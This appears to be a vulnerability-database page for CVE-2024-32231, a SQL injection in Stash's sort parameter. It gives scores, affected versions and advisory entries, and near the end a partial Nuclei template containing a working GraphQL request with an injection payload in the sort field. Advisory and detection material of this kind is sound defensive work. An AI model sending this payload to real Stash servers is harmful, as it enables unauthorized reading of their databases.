CVE-2024-32231
published 2024-08-15CVE-2024-32231: Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
PriorityP347medium6.3CVSS 3.1
AVNACLPRLUINSUCLILAL
EXPLOIT
EPSS
1.18%
63.8th percentile
Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | stashapp_stash | >= 0 < 0.26.0 | 0.26.0 |
| stashapp | stash | <= 0.25.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
SQL injection in github.com/stashapp/stash
osv·2024-08-16
CVE-2024-32231 SQL injection in github.com/stashapp/stash
SQL injection in github.com/stashapp/stash
SQL injection in github.com/stashapp/stash
OSV
SQL injection in github.com/stashapp/stash
osv·2024-08-15
CVE-2024-32231 [CRITICAL] SQL injection in github.com/stashapp/stash
SQL injection in github.com/stashapp/stash
Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
GHSA
SQL injection in github.com/stashapp/stash
ghsa·2024-08-15
CVE-2024-32231 [CRITICAL] CWE-89 SQL injection in github.com/stashapp/stash
SQL injection in github.com/stashapp/stash
Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
No detection rules found.
Nuclei
Stash < 0.26.0 - SQL Injection
nuclei·CVSS 6.3
CVE-2024-32231 [MEDIUM] Stash < 0.26.0 - SQL Injection
Stash Stash"
tags: cve,cve2024,stash,sqli,vuln
http:
- raw:
- |
POST /graphql HTTP/1.1
Host: {{Hostname}}
Content-type: application/json
{"operationName":"FindPerformers","variables":{"filter":{"q":"","page":1,"per_page":40,"sort":"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -","direction":"ASC"},"performer_filter":{}},"query":"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\n findPerformers(\n filter: $filter\n performer_filter: $performer_filter\n performer_ids: $performer_ids\n ) {\n count\n performers {\n ...PerformerData\n __typename\n }\n __typename\n }\n}\n\nfragment PerformerData on Performer {\n id\n name\n disambiguation\n url\n gender\n twitter\n instagram\n birthdat
2024-08-15
Published